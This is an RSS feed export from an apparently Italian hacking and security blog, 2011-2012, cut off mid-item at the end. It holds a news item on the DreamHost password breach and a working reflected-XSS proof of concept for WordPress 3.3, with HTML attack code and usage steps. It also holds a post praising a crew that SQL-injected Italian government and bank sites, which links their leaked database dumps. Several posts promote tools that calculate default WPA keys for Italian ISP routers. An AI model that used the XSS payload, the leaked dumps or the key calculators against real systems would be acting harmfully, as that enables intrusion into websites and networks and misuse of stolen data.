<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; Exploit</title>
	<atom:link href="http://www.capn3m0.org/category/sicurezza/exploit-sicurezza/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Wed, 08 Feb 2012 16:58:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>DreamHost, cambio password per tutti i Clienti!</title>
		<link>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html</link>
		<comments>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html#comments</comments>
		<pubDate>Sun, 22 Jan 2012 10:56:39 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[dreamhost]]></category>
		<category><![CDATA[dreamhost account ftp]]></category>
		<category><![CDATA[dreamhost change password]]></category>
		<category><![CDATA[dreamhost violated]]></category>
		<category><![CDATA[password hack]]></category>
		<category><![CDATA[sicurezza dreamhost]]></category>
		<category><![CDATA[vulnerabilità dreamhost]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4655</guid>
		<description><![CDATA[DreamHost tra i più grandi fornitori di Servizi Hosting Americani la scorsa notte ha inviato un&#8217;email a tutti i suoi Clienti invitandoli a modificare tutte le password Ftp poiché c&#8217;è la possibilità che queste siano finite in mano ad un gruppo di hackers. L&#8217;azienda ha provveduto ad effettuare un cambio password massivo che ha richiesto un [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/dreamhost.gif" rel="lightbox[4655]" title="dreamhost"><img class="alignleft size-thumbnail wp-image-4656" title="dreamhost" src="http://www.capn3m0.org/wp-content/uploads/2012/01/dreamhost-150x150.gif" alt="DreamHost, cambio password per tutti i Clienti!" width="150" height="150" /></a><strong><a title="DreamHost" href="http://dreamhost.com/" target="_blank">DreamHost</a></strong> tra i più grandi fornitori di Servizi Hosting Americani la scorsa notte ha inviato un&#8217;email a tutti i suoi Clienti invitandoli a <strong>modificare tutte le password Ftp</strong> poiché c&#8217;è la possibilità che queste siano finite in mano ad un gruppo di hackers.</p>
<p>L&#8217;azienda ha provveduto ad effettuare un cambio password massivo che ha richiesto un po&#8217; più del previsto dato che attualmente DreamHost gestisce oltre 1 milione di siti web. DreamHost ha anche pregato i propri Clienti <strong>di cambiare le password delle caselle email</strong> utilizzate come riferimento su DreamHost.</p>
<p>A questo link è possibile vedere gli aggiornamenti effettuati in tempo record da DreamHost:</p>
<p><a href="http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/" target="_blank">http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/</a></p>
<p>dove si può riscontrare che l&#8217;intervento di cambio password è ormai terminato.</p>
<p>Questo il testo dell&#8217;email inviata ai Clienti:</p>
<blockquote><p> IMPORTANT INFORMATION: We are writing to let you know that there may have been illegal and unauthorized access to some of your passwords at DreamHost today. <em><strong>Our security systems detected the potential breach this morning and we immediately took the defensive precaution of expiring and resetting all FTP/shell access passwords for all DreamHost customers and their users.</strong></em> There are three different types of passwords at DreamHost: a Web panel password (for logging in to the panel), e-mail passwords, and FTP/shell access passwords. Only the FTP/shell access passwords appear to have been compromised by the illegal access. Web panel passwords, e-mail passwords, and billing information for DreamHost customers were not affected or accessed. Refer to the following DreamHost status post for details:<a href="http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/">http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/</a></p>
<p>IMPORTANT ACTION REQUIRED:</p>
<p>1. To create a new FTP/shell access password for your DreamHost account, please log in to your DreamHost Web panel (https://panel.dreamhost.com/), select &#8220;Manage Users&#8221; in the top left, then select &#8220;Edit&#8221; next to each user, and type in a new password. Make sure you click &#8220;Save Changes&#8221; at the bottom of the page.</p>
<p>2. We are also requesting that you change your e-mail password. We are not enforcing this change at this time as we do not believe that e-mail passwords were compromised. However we strongly recommend that you change your e-mail password as a precaution. To change the passwords for your e-mail users or yourself, log in to the DreamHost panel at (https://panel.dreamhost.com/), select &#8220;Manage Email&#8221; in the top left, select &#8220;Edit&#8221; next to each e-mail user address, and choose a new password for each. Make sure you click &#8220;Save Changes&#8221; at the bottom of the page.</p>
<p>We sincerely apologize for any inconvenience this may cause. If you have any additional questions about this process, please contact us through the support page in the panel.</p>
<p>Note that DreamHost will never ask you for personal or account information in an e-mail. Please exercise caution if you receive any other e-mails that ask for personal information or direct you to a Web site where you are asked to provide personal information.</p>
<p>Sincerely,</p>
<p>The DreamHost Team</p></blockquote>
<p>Come <a href="http://blog.dreamhost.com/2012/01/21/security-update/" target="_blank">spiega </a><strong>Simon Anderson</strong>, CEO di DreamHost, in risposta ad un cliente:<a href="http://www.capn3m0.org/wp-content/uploads/2012/01/simonanderson.jpg" rel="lightbox[4655]" title="simonanderson"><img class="alignright size-thumbnail wp-image-4657" title="simonanderson" src="http://www.capn3m0.org/wp-content/uploads/2012/01/simonanderson-150x150.jpg" alt="DreamHost, cambio password per tutti i Clienti!" width="150" height="150" /></a></p>
<blockquote><p>our systems have stored and used encrypted passwords for a number of years, however <em><strong>the hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted</strong></em>. We’ve now confirmed that there are no more legacy unencrypted passwords in our systems. And we’re investigating further measures to ensure security of passwords including when a customer requests their password by email (this was not the issue here, though). Re your shell accounts, I’d suggest that you select a new password just to be sure.</p></blockquote>
<p>l&#8217;<strong>hacker ha avuto accesso ad una Tabella di un Database</strong> che per errore conteneva alcuni <strong>account Ftp e Shell non criptati</strong> che han poi permesso l&#8217;accesso a tutti i dati dei Clienti.</p>
<p>Per ora non ci sono state azioni/attacchi massivi verso gli account hackerati  e con il cambio password e la patch della vulnerabilità il problema dovrebbe essere risolto!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Siti istituzionali violati dal pr0_alpha_team</title>
		<link>http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html</link>
		<comments>http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html#comments</comments>
		<pubDate>Sat, 07 Jan 2012 02:38:45 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[attacco sql injection]]></category>
		<category><![CDATA[banca delle marche hack]]></category>
		<category><![CDATA[bancamarche.it hack]]></category>
		<category><![CDATA[dump database]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[italia.gov.it hack]]></category>
		<category><![CDATA[pr0_alpha_team]]></category>
		<category><![CDATA[pro alfa team]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4158</guid>
		<description><![CDATA[Una crew tutta italiana, pr0_alpha_team, nelle ultime ore ha iniziato a far parlare di se dopo aver violato i Database di molti siti istituzionali italiani. I più importanti sono: - Italia.gov.it - Bancamarche.it - Ufficio Italiano Brevetti - Università di Siena Guardando l&#8217;archivio degli hack del pr0_alpha_team sul sito Zone-H si vede che da Novembre [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-4159" title="pr0_alpha_team" src="http://www.capn3m0.org/wp-content/uploads/2012/01/alpha-150x150.jpg" alt="Siti istituzionali violati dal pr0 alpha team" width="150" height="150" />Una <strong>crew tutta italiana, <a title="pr0_alpha_team Twitter" href="https://twitter.com/#!/pr0_alpha_team" target="_blank">pr0_alpha_team</a>,</strong> nelle ultime ore ha iniziato a far parlare di se dopo aver <strong>violato i Database di molti siti istituzionali italiani</strong>. I più importanti sono:<br />
- <a href="http://www.italia.gov.it/" target="_blank">Italia.gov.it</a><br />
- <a href="http://www.bancamarche.it/" target="_blank">Bancamarche.it</a><br />
- <a href="http://www.uibm.gov.it/" target="_blank">Ufficio Italiano Brevetti</a><br />
- <a title="Università di Siena" href="http://www.saul.unisi.it  " target="_blank">Università di Siena</a></p>
<p>Guardando l&#8217;archivio degli hack del <strong>pr0_alpha_team</strong> sul sito <a title="pr0_alpha_team Zone-H" href="http://www.zone-h.org/archive/notifier=alpha_team" target="_blank"><strong>Zone-H</strong></a> si vede che da Novembre 2011 ad oggi hanno già operato <strong>numerosi attacchi verso siti di Comuni e similari</strong>.<br />
Questo ultimo è degno di nota dato che, come indicato, si tratta di vittime illustri dalle quali sono state sottratte informazioni dai loro Database.</p>
<p>L&#8217;attacco è stato possibile grazie ad una <strong>vulnerabilità di tipo Sql Injection</strong> che ha permesso di ottenere pieno accesso ai database e di effettuarne un Dump degli stessi.</p>
<p>A dimostrazione di ciò i membri della crew hanno reso disponibili alcuni stralci dei Database violati:<br />
- <a title="Dump Database Italia.gov.it" href="http://sprunge.us/JMQe" target="_blank">Dump Db Italia.gov.it</a><br />
- <a title="Dump Database BancaMarche.it" href="http://sprunge.us/hSBI" target="_blank">Dump Db Bancamarche.it</a><br />
- <a title="Dump Database Ufficio Italiano Brevetti" href="http://sprunge.us/ZDKD" target="_blank">Dump Db Ufficio Italiano Brevetti</a><br />
- <a title="Dump Database Università di Siena" href="http://sprunge.us/bFHG" target="_blank">Dump Db Università di Siena</a></p>
<p>Come fa giustamente notare <a title="Luca Mercatanti WebSite" href="http://www.luca-mercatanti.com/2012/01/06/italia-gov-it-ufficio-italiano-brevetti-universita-di-siena-ed-altri-enti-violati-da-una-crew-italiana/" target="_blank">Luca Mercatanti</a> gli attacchi verso siti istituzionali o verso Banche mettono ancora una volta in evidenza l&#8217;incompetenza e la superficialità con cui viene gestita la <strong>sicurezza informatica</strong> nel nostro paese. Altra cosa allarmante è come non sia stata data alcuna notizia di questa azione. Probabilmente il sito di una banca violato non è cosa importante per i nostri giornalisti.</p>
<p>Leggendo la loro <a title="pr0_alpha_team Twitter" href="https://twitter.com/#!/pr0_alpha_team" target="_blank">pagina Twitter</a> si deduce che non si fermeranno quindi non resta che aspettare e vedere quali altri siti verrano colpiti.</p>
<p>Complimenti al <strong>pr0_alpha_team</strong>!</p>
<p class="alignleft size-thumbnail wp-image-4159" title="pr0_alpha_team">
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WordPress 3.3, 0-day Reflected XSS Vulnerability</title>
		<link>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html#comments</comments>
		<pubDate>Tue, 03 Jan 2012 08:48:31 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[cross site scripting]]></category>
		<category><![CDATA[vulnerabilità wordpress]]></category>
		<category><![CDATA[wordpress 0-day]]></category>
		<category><![CDATA[wordpress 3.3]]></category>
		<category><![CDATA[wordpress exploit]]></category>
		<category><![CDATA[wordpress vulnerability]]></category>
		<category><![CDATA[wordpress zero-day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4058</guid>
		<description><![CDATA[A pochi giorni dal rilascio della nuova versione di WordPress, la 3.3, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti. Praticamente per eseguire l&#8217;exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima. Una volta fatto ciò è necessario [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/wordpress.jpg" rel="lightbox[4058]" title="WordPress"><img class="alignleft size-thumbnail wp-image-1045" title="WordPress" src="http://www.capn3m0.org/wp-content/uploads/2010/10/wordpress-150x150.jpg" alt="WordPress 3.3, 0 day Reflected XSS Vulnerability" width="150" height="150" /></a>A pochi giorni dal rilascio della nuova versione di <a title="[UPGRADE] WordPress 3.3: Sonny suona per noi" href="http://www.capn3m0.org/upgrade-wordpress-3.3-sonny-suona-per-noi.html"><strong>WordPress</strong>, la <strong>3.3</strong></a>, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti.</p>
<p>Praticamente per eseguire l&#8217;<strong>exploit</strong> è necessario per prima cosa <strong>pubblicare un commento sul WordPress vittima</strong>.</p>
<p>Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;title&gt;Wordpress 3.3 XSS PoC&lt;/title&gt;
&lt;body&gt;
&lt;form name=&quot;XSS&quot; id=&quot;XSS&quot; action=&quot;http://192.168.1.102/wordpress/wp-comments-post.php?&lt;/style&gt;&lt;script&gt;document.write(Date())&lt;/script&gt;&lt;style&gt;&quot; method=&quot;POST&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;author&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;url&quot; value=&quot;&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;submit&quot; value=&quot;Post Comment&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment_post_ID&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment_parent&quot; value=&quot;0&quot;/&gt;
&lt;input type=&quot;button&quot; value=&quot;Click Me&quot; /&gt;
&lt;/style&gt;&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Al posto di &#8220;<strong><em>replace me</em></strong>&#8221; vanno inseriti gli stessi dati usati nel precedente commento e al posto di &#8220;<strong>http://192.168.1.102/wordpress/</strong>&#8221; va inserito il riferimento del sito vittima.</p>
<p>A questo punto basterà cliccare sul tasto &#8220;<strong>Click me</strong>&#8221; e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel &#8220;form action&#8221; della nostra pagina verrà eseguito.</p>
<p>Nell&#8217;esempio il codice Javascript da eseguire era il seguente:</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>document.<span style="color: #000066; font-weight: bold;">write</span><span style="color: #009900;">&#40;</span>Date<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></pre></div></div>

<p>che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,<strong>viene correttamenete eseguito dimostrando la vulnerabilità XSS</strong>.</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/wordpress_3.3_xss.png" rel="lightbox[4058]" title="WordPress 3.3 XSS"><img class="aligncenter size-medium wp-image-4059" title="WordPress 3.3 XSS" src="http://www.capn3m0.org/wp-content/uploads/2012/01/wordpress_3.3_xss-300x119.png" alt="WordPress 3.3, 0 day Reflected XSS Vulnerability" width="300" height="119" /></a></p>
<p>In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.</p>
<p>Link di riferimento</p>
<p><strong><a title="Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 - The Hackers News" href="http://thehackernews.com/2012/01/zero-day-reflected-cross-site-scripting.html" target="_blank">Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 &#8211; The Hackers News</a></strong><br />
<strong><a title="Sorgenti Exploit 0-day WordPress 3.3" href="http://pastebin.com/H1CeegTE" target="_blank">Sorgenti Pastebin.com</a></strong></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Teletu WPA Finder 1.3 by WifiShark</title>
		<link>http://www.capn3m0.org/teletu-wpa-finder-1.3-by-wifishark.html</link>
		<comments>http://www.capn3m0.org/teletu-wpa-finder-1.3-by-wifishark.html#comments</comments>
		<pubDate>Sun, 04 Dec 2011 09:29:02 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[teletu wifi crack]]></category>
		<category><![CDATA[teletu wireless crack]]></category>
		<category><![CDATA[teletu wpa]]></category>
		<category><![CDATA[teletu wpa crack]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wifi crack]]></category>
		<category><![CDATA[wpa finder]]></category>
		<category><![CDATA[wpa finder 1.3 download]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=3973</guid>
		<description><![CDATA[Lo scorso 27 Novembre lo Staff del noto Team WifiShark hanno rilasciato l&#8217;ultima versione, la 1.3, del tool per calcolare le chiavi Wpa per le reti Teletu. L&#8217;utente swsooue l&#8217;ha pubblicato tramite il Forum della Community WifiShark in questo post. In questa ultima versione del Teletu Wpa Finder sono stati aumentati i macig numbers e [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/12/tele2.jpg" rel="lightbox[3973]" title="Teletu WPA Finder 1.3"><img class="size-thumbnail wp-image-3974 alignleft" title="Teletu WPA Finder 1.3" src="http://www.capn3m0.org/wp-content/uploads/2011/12/tele2-150x150.jpg" alt="Teletu WPA Finder 1.3 by WifiShark" width="150" height="150" /></a>Lo scorso 27 Novembre lo Staff del noto <a title="WifiShark Forum" href="http://wiki.wifi-shark.co.cc/doku.php" target="_blank"><strong>Team WifiShark</strong></a> hanno rilasciato l&#8217;ultima versione, la <strong>1.3</strong>, del tool per <strong>calcolare le chiavi Wpa per le reti Teletu</strong>.</p>
<p>L&#8217;utente <strong>swsooue</strong> l&#8217;ha pubblicato tramite il Forum della <strong>Community WifiShark</strong> in questo <a href="http://forum.wifi-shark.co.cc/showthread.php?tid=1638" target="_blank"><strong>post</strong></a>.</p>
<p>In questa ultima versione del <strong>Teletu Wpa Finder</strong> sono stati aumentati i macig numbers e di conseguenza sarà possibile <strong>calcolare le chiavi Wpa</strong> di un numero maggiore di SSID.</p>
<p>Potete effettuare il <strong>download</strong> dal seguente link:</p>
<p><a title="TeleTu Wpa Finder 1.3" href="http://adf.ly/41SAO" target="_blank"><strong>TeleTu Wpa Finder 1.3 DOWNLOAD</strong></a></p>
<p>Ringraziamo la<strong> community WifiShark</strong> per la passione e la dedizione nello studio delle reti Wireless.</p>
<p><strong>N.B. </strong></p>
<p><strong>Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).</strong></p>
<p><strong> Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.</strong></p>
<p><strong>L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/teletu-wpa-finder-1.3-by-wifishark.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool Alice Wpa Calculator Online</title>
		<link>http://www.capn3m0.org/tool-alice-wpa-calculator-online.html</link>
		<comments>http://www.capn3m0.org/tool-alice-wpa-calculator-online.html#comments</comments>
		<pubDate>Tue, 29 Nov 2011 00:43:36 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[alice crack]]></category>
		<category><![CDATA[alice wpa calculator]]></category>
		<category><![CDATA[alice wpa calculator aggiornato]]></category>
		<category><![CDATA[alice wpa calculator online]]></category>
		<category><![CDATA[chiave alice wifi]]></category>
		<category><![CDATA[crack wifi]]></category>
		<category><![CDATA[crack wpa]]></category>
		<category><![CDATA[crack wpa alice online]]></category>
		<category><![CDATA[wpa alice online]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=3955</guid>
		<description><![CDATA[Dopo il successo di ieri con la pubblicazione del Fastweb Wpa Calculator OnLine oggi provvediamo ad annunciare il rilascio della prima versione dell&#8217;Alice Wpa Calculator OnLine. In questa prima versione sono presenti tutti i Magic Numbers aggiornati a Settembre 2011 ed è possibile calcolare la Wpa sia inserendo il solo SSID Alice (Es. Alice-12345678) sia [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/11/wifi-hacking.png" rel="lightbox[3955]" title="wifi hacking"><img class="alignleft size-thumbnail wp-image-3956" title="wifi hacking" src="http://www.capn3m0.org/wp-content/uploads/2011/11/wifi-hacking-150x150.png" alt="Tool Alice Wpa Calculator Online" width="150" height="150" /></a>Dopo il successo di ieri con la pubblicazione del <a href="http://www.capn3m0.org/fastweb-wpa-calculator-online"><strong>Fastweb Wpa Calculator OnLine</strong></a> oggi provvediamo ad annunciare il rilascio della prima versione dell&#8217;<a href="http://www.capn3m0.org/alice-wpa-calculator-online"><strong>Alice Wpa Calculator OnLine</strong></a>.</p>
<p>In questa prima versione sono presenti tutti i Magic Numbers aggiornati a Settembre 2011 ed è possibile <strong>calcolare la Wpa</strong> sia inserendo il solo <strong>SSID Alice</strong> (Es. Alice-12345678) sia inserendo SSID più Mac Address del Modem.</p>
<p>Per ora vi invitiamo a testare il nostro tool per il <strong>calcolo delle Wpa Alice</strong> direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/alice-wpa-calculator-online"><span style="font-size: large;"><strong>PROVATELO QUI</strong></span></a></p>
<p><strong>N.B. </strong></p>
<p><strong>Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).</strong></p>
<p><strong> Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.</strong></p>
<p><strong>L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/tool-alice-wpa-calculator-online.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool Fastweb Wpa Calculator Online</title>
		<link>http://www.capn3m0.org/tool-fastweb-wpa-calculator-online.html</link>
		<comments>http://www.capn3m0.org/tool-fastweb-wpa-calculator-online.html#comments</comments>
		<pubDate>Sun, 27 Nov 2011 09:03:34 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[chiave fastweb wifi]]></category>
		<category><![CDATA[crack wifi]]></category>
		<category><![CDATA[crack wpa]]></category>
		<category><![CDATA[crack wpa fastweb online]]></category>
		<category><![CDATA[fastweb crack]]></category>
		<category><![CDATA[fastweb wpa calculator]]></category>
		<category><![CDATA[fastweb wpa calculator aggiornato]]></category>
		<category><![CDATA[fastweb wpa calculator online]]></category>
		<category><![CDATA[wpa fastweb online]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=3921</guid>
		<description><![CDATA[Dopo le numerose richieste ricevute via email o dai vostri commenti abbiamo deciso di creare il nostro Tool on line che consente il calcolo delle chiavi Wpa Fastweb senza dover scaricare il software Wpa Tester o Wpa Calculator. Il tool è stato pubblicato a questo link e per l&#8217;occasione abbiamo provveduto a ri-organizzare il Menu [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/11/fastweb.jpg" rel="lightbox[3921]" title="fastweb"><img class="alignleft size-thumbnail wp-image-3906" title="fastweb" src="http://www.capn3m0.org/wp-content/uploads/2011/11/fastweb-150x150.jpg" alt="Tool Fastweb Wpa Calculator Online" width="150" height="150" /></a>Dopo le numerose richieste ricevute via email o dai vostri commenti abbiamo deciso di creare il nostro <strong>Tool on line</strong> che consente il <strong>calcolo delle chiavi Wpa Fastweb</strong> senza dover scaricare il software <strong>Wpa Tester o Wpa Calculator</strong>.</p>
<p>Il tool è stato pubblicato a <a href="http://www.capn3m0.org/fastweb-wpa-calculator-online" target="_blank"><strong>questo link</strong></a> e per l&#8217;occasione abbiamo provveduto a ri-organizzare il Menu in alto. Allo stato attuale è stata creata la voce <strong>Tools </strong>nel quale sono stati raggruppati tutto ciò che è abbiamo sviluppato in questi anni.</p>
<p>Al momento troverete:</p>
<p>- <a href="http://www.capn3m0.org/fastweb-wpa-calculator-online"><strong>Fastweb Wpa Calculator On Line</strong></a> per il calcolo delle chiavi Wpa dei Router Fastweb</p>
<p>- <a href="http://www.capn3m0.org/md5-encrypt-decrypt"><strong>Md5 Encrypt/Decrypt Tool</strong></a> per criptare e decriptare gli hash MD5 usati prevalentemente per le passwords</p>
<p>- <strong><a href="http://www.capn3m0.org/wp-users-page">Wp-users-page</a> </strong>plugin per WordPress per generare la lista dello Staff</p>
<p>A breve provvederemo a sviluppare anche lo script per il <strong>calcolo on line delle chiavi Wpa</strong> di <strong>Alice</strong> e di <strong>TeleTu</strong>.</p>
<p>Per ora vi invitiamo a testare il nostro tool per il <strong>calcolo delle Wpa Fastweb</strong> direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/fastweb-wpa-calculator-online"><span style="font-size: large;"><strong>PROVATELO QUI</strong></span></a></p>
<p><strong>N.B. </strong></p>
<p><strong>Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).</strong></p>
<p><strong> Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.</strong></p>
<p><strong>L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/tool-fastweb-wpa-calculator-online.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wpa Tester 1.7, ora anche TeleTu oltre ad Alice e Fastweb</title>
		<link>http://www.capn3m0.org/wpa-tester-1.7-ora-anche-teletu-oltre-ad-alice-e-fastweb.html</link>
		<comments>http://www.capn3m0.org/wpa-tester-1.7-ora-anche-teletu-oltre-ad-alice-e-fastweb.html#comments</comments>
		<pubDate>Tue, 22 Nov 2011 21:20:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[alice]]></category>
		<category><![CDATA[alice wpa crack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[fastweb]]></category>
		<category><![CDATA[fastweb wpa crack]]></category>
		<category><![CDATA[telecom]]></category>
		<category><![CDATA[teletu wifi crack]]></category>
		<category><![CDATA[teletu wpa crack]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wifi crack]]></category>
		<category><![CDATA[wpa tester]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=3887</guid>
		<description><![CDATA[Pochi giorni fa avevamo pubblicato questo articolo dove veniva recensita la versione 1.6 del noto software Wpa Tester creato da Francesco Pompili per l&#8217;analisi, il calcolo e il crack delle reti Wifi di Telecom Alice e Fastweb. Questa versione rispetto alle precedenti grazie all&#8217;aggiornamento del file &#8220;config.txt&#8221; permetteva di analizzare un numero maggiori di reti [...]]]></description>
